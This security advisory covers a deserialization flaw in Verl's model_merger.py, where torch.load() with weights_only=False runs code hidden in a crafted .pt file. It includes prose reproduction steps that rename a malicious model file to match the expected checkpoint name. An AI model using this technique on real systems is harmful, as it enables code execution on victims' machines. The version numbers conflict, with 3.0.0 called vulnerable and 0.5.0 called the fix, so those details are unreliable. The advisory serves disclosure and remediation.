Volcengine Verl Deserialization Vulnerability in Model Merger Script Allowing Remote Code Execution

A deserialization vulnerability has been identified in Volcengine's Verl library version 3.0.0, specifically within the model_merger.py script. This issue arises when the 'fsdp' backend is used, as the script improperly handles user-supplied .pt files by calling torch.load() with weights_only set to False. This flaw allows attackers to execute arbitrary code by crafting a malicious model file and convincing a victim to load it. The vulnerability could be exploited by placing the harmful file in a directory that the script accesses, potentially leading to code execution with the user's privileges.

Impact

Exploitation of this vulnerability allows for arbitrary code execution on the system where the script is run, with the same privileges as the user executing the script.

Reproduction

To reproduce this vulnerability, first create a malicious model file named 'malicious.pt' that includes code to be executed, such as a command to create a directory. After placing this file in a directory named 'TESTS', rename it to 'model_world_size_4_rank_0.pt' to match the expected filename pattern. Finally, run the model_merger.py script with the 'fsdp' backend, specifying the 'TESTS' directory as the local model path. The crafted code will be executed on the system, demonstrating the vulnerability.

Remediation

Users are advised to upgrade to Volcengine Verl version 0.5.0 or later, where this vulnerability has been addressed. Additionally, PyTorch should be updated to version 2.6.0 or later, which reduces deserialization risks by default.